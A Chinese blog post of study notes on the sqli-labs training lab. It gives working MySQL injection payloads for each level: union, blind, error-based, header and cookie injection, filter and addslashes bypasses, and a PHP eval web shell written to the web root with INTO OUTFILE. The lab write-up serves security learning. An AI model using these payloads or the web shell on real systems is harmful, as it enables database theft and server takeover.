sqli-lab学习笔记

最新推荐文章于 2024-04-28 17:23:36 发布
最新推荐文章于 2024-04-28 17:23:36 发布
阅读量451 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a895963248/article/details/97000914
本文是一篇关于SQL注入的学习笔记,详细记录了基础和高级挑战的各个阶段,包括GET和POST类型的单引号、双引号、整型、双注入、盲注等各种类型注入的技巧和方法,涉及报错、布尔、时间和报错盲注,以及如何绕过WAF等防护措施。通过实验学习,理解SQL注入原理并提升安全防护能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录


information_schema.schemata包含所有数据库的名

字段含义
schema_name数据库名

information_schema.tables包含所有库的表名

字段含义
table_schema数据库名
table_name表名

information_schema.columns包含所有表的字段

字段含义
table_schema数据库名
table_name表名
column_name列名

Page-1(Basic Challenges)

Less 1 GET - Error based - Single quotes - string (基于错误的GET单引号字符型注入)

id=1显示正常,加上单引号id=1’页面报错
在这里插入图片描述
根据报错信息可以猜测输入的$id值在单引号中
查看源代码,验证猜想

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

以下id为非正确值,使用--+截断,也可用#的url编码%23截断
payload
判断列数

?id=-1' order by 3--+

判断显示位

?id=-1' union select 1,2,3 --+

在这里插入图片描述
显示位为2和3
爆库名得库名为security

?id=-1' union select 1,2,database() --+

爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

或者

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

其中0x7365637572697479为库名security的16进制
得emails,referers,uagents,users四张表
爆users表字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

或者table_name=用users的16进制代替
得如下字段

user_id
first_name
last_name
user
password
avatar
last_login
failed_login
id
username
password

我们需要获取username以及对应的password的值
爆数据 用0x3a间隔数据

?id=-1' union select 1,2,group_concat(id,0x3a,username,0x3a,password) from users --+

得到对应数据(列举五个)

idusernamepassword
1DumbDumb
2AngelinaI-kill-you
3Dummyp@ssword
4securecrappy
5stupidstupidity

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

跟Less-1的payload思路一样,不过$id的值没有放在引号中

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

同上,payload=?id=-1

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

同上,$id的值放在带括号的单引号中

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

同上,payload=?id=-1’)

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

同上,$id的值放在双引号中

$id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

同上,payload=?id=-1"

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

何为盲注?盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注,盲注分为三类
•基于布尔 SQL 盲注
•基于时间的 SQL 盲注
•基于报错的 SQL 盲注
布尔盲注常用到以下几个函数

函数含义
left(a,b)左侧截取 a 的前b个字符
substr(a,b,c)/mid(a,b,c)从第 b 个字符开始 截取 a 中连续 c 个字符
ascii(a)/ord(a)将a转化为ascii码

时间盲注除以上函数外常用到以下函数

函数含义
if(exp,a,b)如果exp为真,则返回 a ,否则返回 b
sleep(a)暂停 a 秒

报错盲注常用到以下函数

函数含义
extractvalue(a,concat(0x7e,b)将a插入xpath格式的b中,如果b不是该格式将报错
exp(a)返回自然对数e为底,a为幂的值,常用exp(~xxx)超出double范围报错
concat()该函数报错时将查询的信息显示出来
floor()取整函数
rand()产生一个0-1之间的随机数
count(*)返回行数
select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;

floor(rand()*2)要么为0要么为1,由concat函数连接后,返回database()0或者database()1,表中有多少数据就生成多少个该随机数值,对他们进行group by 分组,就只有database()0和database()1了,在加上count(*),就会因为键值重复而报错,database()可替换为其他查询语句

回到Less-5
布尔盲注
payload
判断数据库名长度

?id=1' and length(database())=8 --+

爆数据库名

	?id=1' and left(database(),1)='s' --+
    ?id=1' and left(database(),2)='se' --+
    ?id=1' and left(database(),3)='sec' --+
    ?id=1' and left(database(),4)='secu' --+
    ?id=1' and left(database(),5)='secur' --+
    ?id=1' and left(database(),6)='securi' --+
    ?id=1' and left(database(),7)='securit' --+
    ?id=1' and left(database(),8)='security' --+

爆表名

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+

可知第一张表第一个字符为e,依次类推
爆字段名

?id=1' and (ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117 --+

可知users表中第一个字段第一个字符为u,以此类推
爆数据

 ?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+

可知password字段中第一个数据第一个字符为D,以此类推

时间盲注
时间延迟型手工注入,正确会延迟,错误没有延迟。id无所谓,又不看回显,可以通过浏览器的刷新提示观察延迟情况
payload=?id=1' and if(布尔盲注payload核心部分,sleep(5),1)--+
payload
判断数据库名长度

?id=1' and if(length(database())=8,sleep(5),1) --+

爆数据库名

	?id=1' and if(left(database(),1)='s',sleep(5),1) --+
    ?id=1' and if(left(database(),2)='se',sleep(5),1)  --+
    ?id=1' and if(left(database(),3)='sec',sleep(5),1) --+
    ?id=1' and if(left(database(),4)='secu',sleep(5),1) --+
    ?id=1' and if(left(database(),5)='secur',sleep(5),1) --+
    ?id=1' and if(left(database(),6)='securi',sleep(5),1) --+
    ?id=1' and if(left(database(),7)='securit',sleep(5),1)--+
    ?id=1' and if(left(database(),8)='security',sleep(5),1) --+

爆表名

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101,sleep(5),1) --+

可知第一张表第一个字符为e,依次类推
爆字段名

?id=1' and if((ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117,sleep(5),1) --+

可知users表中第一个字段第一个字符为u,以此类推
爆数据

?id=1' and if((ascii(substr(( select password from users limit 0,1),1,1)))=68,sleep(5),1)--+

可知password列中第一个数据第一个字符为D,以此类推
报错注入
payload
同样
判断列数

?id=-1' order by 3--+

爆数据库名,得知表名为security

?id=-1' union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a --+

爆表名,

?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a --+

得表emails

?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))a from information_schema.tables group by a --+

得表referers
依次类推得到表users
爆字段名

?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a --+

得字段user_id

?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand(0)*2))a from information_schema.tables group by a --+

得列first_name
依次类推得到字段username,password

?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a --+

得用户名Dumb,依次类推得到所有用户名和密码

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

同上,payload=?id=-1"

Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

常用函数

函数含义
load_file(file_name)读取文件并返回该文件的内容作为一个字符串
load data infile从一个文本文件中读取行,并装入一个表中
select…into outfile可以把被选择的行写入一个文件中

我们首先需要设置MySQL文件可以写入
在my.ini中,写入如下一行并重启服务

secure_file_priv=""

查看源码

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

$id在单引号双括号中
payload

?id=1')) union select 1,2,'<? php @eval($_POST["123"]); ?>' into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\aaa.php" --+

我们可以看一下文件是否写入成功

http://127.0.0.1/sqli/Less-7/aaa.php

在这里插入图片描述
文件是存在的,所以用菜刀直接连接即可
在这里插入图片描述

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

同Less-5中布尔盲注

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

同Less-5中时间盲注

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

同上
payload=?id=1"

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

POST与GET注入不同,GET注入可直接在url上修改数据,POST则数据放置在HTML HEADER内,提交需要burp抓包或者用hackbar等工具来进行
三种方法
1.union联合查询
同Less-1
payload
查列数,得知共两列

uname=-1' order by 2 --+&passwd=1&submit=Submit

看显示位

uname=-1' union select 1,2 --+&passwd=1&submit=Submit

在这里插入图片描述
爆库名,得数据库名为security

uname=-1' union select 1,database() --+&passwd=1&submit=Submit

爆表名,得emails,referers,uagents,users四张表

uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=1&submit=Submit

爆users表字段名

uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&passwd=1&submit=Submit

得如下字段

user_id
first_name
last_name
user
password
avatar
last_login
failed_login
id
username
password

爆users表中username和password数据

uname=-1' union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+&passwd=1&submit=Submit

2.报错注入
爆库名

uname=-1' union select count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a --+&passwd=1&submit=Submit

或者

uname=1' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名(推荐用extractvalue的方法,可以一次性爆出多个表,再用not in可查出所有表,之后仅展示extractvalue报错的方法)

uname=-1' union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a --+&passwd=admin&submit=Submit

或者

uname=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

爆字段名

uname=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆出字段名’user_id’,‘first_name’,‘last_name,us’,加上not in 继续爆字段名

uname=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name,us') ))) --+&passwd=admin&submit=Submit

爆表users中username和password列数据

uname=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

3.万能密码

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

看这条语句,如果我们输入username为admin' or '1' ='1#,密码随意
那么这条语句成为

SELECT username, password FROM users WHERE username='admin' or '1' ='1' # and password='$passwd' LIMIT 0,1;

这句话因为or ‘1’ = ‘1’ 恒成立,所以语句也恒成立
这里我们直接输入admin' #也可以起到同样的效果

SELECT username, password FROM users WHERE username='admin' #' and password='$passwd' LIMIT 0,1

同样可以登录成功

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

同Less-11
payload:uname=1")

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

同Less-11中报错注入方法
payload:uname=1’)

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

同Less-11中报错注入方法
payload:uname=1"

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

同Less-5中时间延迟注入
测数据库名长度

uname=admin' and if(length(database())=8,sleep(5),1) --+&passwd=admin&submit=Submit

爆库名

uname=admin' and if(left(database(),1)='s',sleep(5),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),2)='se',sleep(5),1)  --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),3)='sec',sleep(5),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),4)='secu',sleep(5),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),5)='secur',sleep(5),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),6)='securi',sleep(5),1) --+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),7)='securit',sleep(5),1)--+&passwd=admin&submit=Submit
uname=admin' and if(left(database(),8)='security',sleep(5),1) --+&passwd=admin&submit=Submit

爆表名

uname=admin' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101,sleep(5),1) --+&passwd=admin&submit=Submit

爆字段名

uname=admin' and if((ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117,sleep(5),1) --+&passwd=admin&submit=Submit

爆数据

uname=admin' and if((ascii(substr(( select password from users limit 0,1),1,1)))=68,sleep(5),1) --+&passwd=admin&submit=Submit

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

同上
payload:uname=admin")

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

同上,不过这次在password=后面添加payload
如爆库名

uname=admin&passwd=123' and extractvalue(1,concat(0x7e,(select database()))) --+&submit=Submit

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

在输入框输入正确的用户名和密码,可以看到显示出我们的User-Agent信息,大概可以猜测注入点在User-Agent上,我们把User-Agent改成其它内容,证实了我们的猜测
在这里插入图片描述
所以同报错注入,不过后面需要加and '闭合单引号
如爆库名

User-Agent: 'and extractvalue(1,concat(0x7e,(select database()))) and '

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

同上,只是注入点在referer

Referer:'and extractvalue(1,concat(0x7e,(select database()))) and '

Page-2 (Advanced Injections)

Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

在使用正常账号密码admin登陆时,cookie中uname=admin,所以同上,显示位在cookie

Cookie: uname=admin'and extractvalue(1,concat(0x7e,(select database()))) and '

Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

同上,注入点依旧在cookie,不过这次cookie中uname=YWRtaW4=
看上去像是个base64编码,经查询,果然YWRtaW4=是admin的base64编码
所以我们只需要将payload经过base64编码即可

admin'and extractvalue(1,concat(0x7e,(select database()))) and '

的base64编码为

YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSkpKSBhbmQgJw==

payload

Cookie: uname=YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSkpKSBhbmQgJw==

Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)

同上,将明文中单引号改为双引号

Less-23 GET - Error based - strip comments (基于错误的,过滤注释的GET型)

同less-1,不过这里注释符号被过滤了,我们可以在Less-1的payload后面去掉注释符号加上and '1来闭合单引号,而且这里显示位在2

?id=-1' union select 1,database(),3 and '1

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

我们随意注册一个账号,登陆进去后可以看到修改密码的表单
查看源码

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

如果我们注册一个username为admin’#的用户,那么执行修改密码的语句时,就成了这样

UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'

也就是

UPDATE users SET PASSWORD='$pass' where username='admin'

在修改用户admin’#的密码时,就能够修改admin的密码

Less-25 Trick with OR & AND (过滤了or和and)

or和and被过滤时,常用以下几种方式绕过过滤

  • 1.大小写变形
    如Or、AnD、ANd等等
  • 2.双写
    如oorr、anandd等等
  • 3.使用符号形式
    && ||等
  • 4.使用hex、url编码等
    将and、or进行编码 有时&&也被过滤时,使用&&的url编码%26%26也许可以绕过
    payload
?id=1'

报错,注入点存在
猜列数

?id=-1' order by 3--+

发现我们输入的句子变成了

-1' der by 3--

我们可以双写or,得知有3列

?id=-1' oorrder by 3--+

爆库名

?id=-1' union select 1,2,database() --+

爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

这里会报错,看报错的内容发现,information中的or的也被过滤了,同样我们可以双写or

?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+

爆字段名

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' --+

爆数据,注意这里password中or也被过滤了

?id=-1' union select 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) from users --+

Less-25a Trick with OR & AND Blind (过滤了or和and的盲注)

同上,这不过这里是数字型,不用加单引号
payload:?id=-1

less 26 Trick with comments and space (过滤了注释和空格的注入)

这道题过滤了很多东西,查看源码

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

过滤的空格都不能用内联注释符号代替,而网上说的%0a,%0b之类的代替空格,据说在Windows上不管用,所以我们可以找一个不需要空格的查询语句,报错注入的extractvalue和updatexml就是很不错的选择
–和#被过滤了,可以用or ‘1’='1来闭合单引号
payload
爆库名,用%26%26代替&&为and,用括号()框住database()来代替空格

?id=1'%26%26extractvalue(1,concat(0x7e,(select(database()))))oorr'1'='1

爆表名

?id=1'%26%26extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))))oorr'1'='1

爆字段名

?id=1'%26%26extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')%26%26(table_name='users'))))oorr'1'='1

爆数据

?id=1'%26%26extractvalue(1,concat(0x7e,(select(group_concat(username,0x3a,passwoorrd))from(users)where(id)=1)))oorr'1'='1

less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)

less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)

同Less-26 不过没有过滤or,过滤了select和union大小写替换即可绕过,如sElEcT
爆表名

?id=1'%26%26extractvalue(1,concat(0x7e,(sElecT(database()))))or'1'='1

less 27a GET - Blind Based- All your UNION & SELECT belong to us

less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于错误的,有括号的单引号字符型,过滤了union和select等的注入

?id=1') or ('1')=('1

正常显示可知加单引号和括号闭合

less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的,有括号的单引号字符型,过滤了union和select等的注入

Less-29 Protection with WAF 基于WAF的一个错误

直接用Less-1的payload就行了

Less-30 Get-Blind Havaing with WAF

同上,不过用双引号闭合
payload:?id=-1"

Less-31 FUN with WAF

同上,不过用带括号的双引号闭合
payload:?id=-1")

Less-32 Bypass addslashes()

宽字节注入
mysql在进行GBK编码时,会认为两个字符是一个汉字,如%df%27
通常在过滤引号时,用反斜杠转义引号,如’,如果我们可以将引号前面的反斜杠去掉,就绕过了过滤,'的编码为%5c%27,我们在前面加上%df,就成了%df%5c%27,此时会认为%df%5c为一个汉字,此时%27就会单独作为一个字符
payload
爆库名

?id=-1%df%27%20union%20select%201,2,3%20--+

爆表名

?id=-1%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+

爆字段名,为了避免使用单引号,表名users用十六进制表示

?id=-1%bf%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20--+

爆数据

?id=-1%bf%27%20union%20select%201,2,group_concat(id,0x3a,username,0x3a,password)%20from%20users%20--+

Less-33 Bypass addslashes()

payload同Less-33一模一样

Less-34 Bypass Add SLASHES

Less-35 why care for addslashes()

XQin9T1an
关注
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2608
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
sqli-labs通关笔记
怪味巧克力的博客
05-19 573
文章目录Basic InjectionsLess-1 '字符型注入-联合查询Less-2 布尔注入-联合查询Less-3 字符注入-联合查询Less-4 字符注入-联合查询Less-5 字符注入-报错查询Less-6 字符注入-错误回显Less-7 文件读写Less-8 盲注和文件读写Less-9 盲注Less-10 盲注Less-11 单引号POST注入Less-12 双引号POST注入Less-13 双注入 - 字符型 - 变形Less-14 双注入 - 双引号 - 字符串Less-15 盲注/布尔
sqli-labs Writeup
Yukikaze_cxy
05-30 301
【基础储备】=常用的url编码=%20 空格%22 "%23 #%27 '=字符串连接函数=concat_ws(字段1,字段2...)concat(字段1,字段2...)=mysql一些函数=user():当前数据库连接使用的用户database():当前连接使用的数据库version():当前数据库的版本=information_schema库中常用的表=SCHEMATA:存储数据库的基本信息(...
sqli-lab———writeup(11~17)
weixin_45694388的博客
12-10 211
less11 用户名提交单引号显示sql语法错误,故存在sql注入 根据单引号报错,在用户名和密码任意行输入 万能密码:‘ or 1=1# 输入后username语句为:SELECT username, password FROM users WHERE username='' or 1=1; 双引号 password语句:Select * from admin where username='admin' and password='' or 1=1# 单引号 还有比如:1'union sel
sqli-lab————Writeup(18~20)各种头部注入
weixin_45694388的博客
12-10 273
less18 基于错误的用户代理,头部POST注入 admin admin 登入成功(进不去重置数据库) 显示如下 有user agent参数,可能存在注入点 显示版本号: 爆库:User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ' 库名: less19基于头部的RefererPOST报错注入 抓包 admin登陆什么也没有 在referer后加单引号有回显sql语法错误 然后就和 18一样了:Ref
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 11万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sql注入练习系统sqli-lab的部分解题笔记.zip
03-03
“sql注入练习系统sqli-lab的部分解题笔记.zip”是一份珍贵的学习资源,它不仅提供了实践SQL注入技术的机会,还着重介绍了防御策略,是网络安全爱好者的宝贵参考资料。通过对该文档的学习和实践,可以加深对SQL注入...
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
2401_84281655的博客
04-28 757
所以ascii码为115,第一位字母为s用脚本跑得到库名:security③走流程只要修改脚本中的select语句即可。
sqli-labs学习笔记(五)less 15-16 post盲注
闵行小鱼塘
09-08 629
继续学习sqli-labs,本篇是less15-16
Sqli-labs靶场搭建(适合新手小白围观)
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs环境搭建
小橙子的博客
03-15 5678
1、本地下载phpstudy,下载地址如下: https://www.xp.cn/download.html 安装完成后界面如下。 2、下载sqli-labs源码 https://github.com/Audi-1/sqli-labs 3、把下载好的文件放到phpstudy安装的www目录下。如本例 4、配置数据库 打开D:\phpstudy_pro\WWW\sqli-labs-master\sql-connections\db-creds.inc 把密码设置为root 5..
sql注入内联注释过waf
qq_36282328的博客
01-17 1万+
sql注入内联注释过waf 正常输入:1 然后尝试:-1 order by 被拦截 然后单独尝试order或者by 单独的order或者by并没有被拦截,内联注释干扰黑名单检测 -1/**/order/**/by 3 只是简单的/**/也被过滤了,那么就在/**/中间加干扰 用-1 and 1=1来进行测试,burp抓包,然后在被过滤的关键字前后加注释,注释中间用§ §来进行爆破定点,配置...
sqli-labs靶场实现(四)【GET型的报错的注入(floor()、rand()、group by、count())】(less-5~6、具体步骤+图文详解)
weixin_46709219的博客
12-17 596
一)GET报错注入   1)报错注入介绍   2)GET单引号报错注入   3)GET双引号报错注入   4)sqlmap安全测试 二)补充知识 ———————————————————————————————————————————————————————— 一)GET报错注入 1)报错注入介绍 通过报错来显示出具体的信息,报错需要count(*),rand()、group by,三者缺一不可。其中,对于报错注入几个常用函数进行讲解: rand()————随机函数,返回0~1之间的某个值,它看起
sqli-lab学习笔记学习笔记)(11-20)
大方子
08-09 2532
接下来的关卡是post的注入,之前的都是GET型注入   所以需要准备这个: firfox+hackbar(firfox的插件)   自己常犯得错:   1.第15关length(database())我会下意识的加上select 变成length(select database()) 2.用变形双注入里面前面是用or连接,不是用union连接 3.17关的update(1,co...
sqli-lab(5~6详解)
gongjingege的博客
10-17 771
** Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) ** 知识点:1,时间延迟型手工注入;布尔型手工注入;使用concat聚合函数 2,payload原理及防御措施 3,sqlmap真香,脚本也好使 ** 0x0a 时间延迟型手工注入 ** ps: 什么是时间盲注,时间盲注就是页面不会有回显,没有回显怎么办?这时候我们可以通过sleep(),让他沉睡 为什么通过sleep() 可以判断是否存在时间盲注,因为只要
sqli-labs闯关指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-lab学习笔记学习笔记)(21-30)
大方子
08-21 5981
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a关   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
SQLi Labs writeup (附py脚本)
Le0nis的博客
07-22 1979
less-1GET – 报错注入 – 单引号 – 字符型 PHP代码为: SELECT * FROM users WHERE id='$id' LIMIT 0,1 SQL实际语句为: SELECT * FROM users WHERE id='1' LIMIT 0,1; 1、判断注入 ?id=1
Sqli-Lab靶场-基础篇笔记
Pr0m1se1n的博客
11-26 1599
SQL注入之联合查询注入&报错注入&SQL文件读取文件写入&盲注
sqli-lab下载
最新发布
03-22
### 如何下载和安装 SQLi-Lab 渗透测试工具 #### 下载 SQLi-Lab 工具 可以通过 GitHub 上的官方仓库获取 SQLi-Lab 的源码。以下是具体的地址以及操作方式: 访问以下链接可以找到 SQLi-Labs 的项目页面: ```plain...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值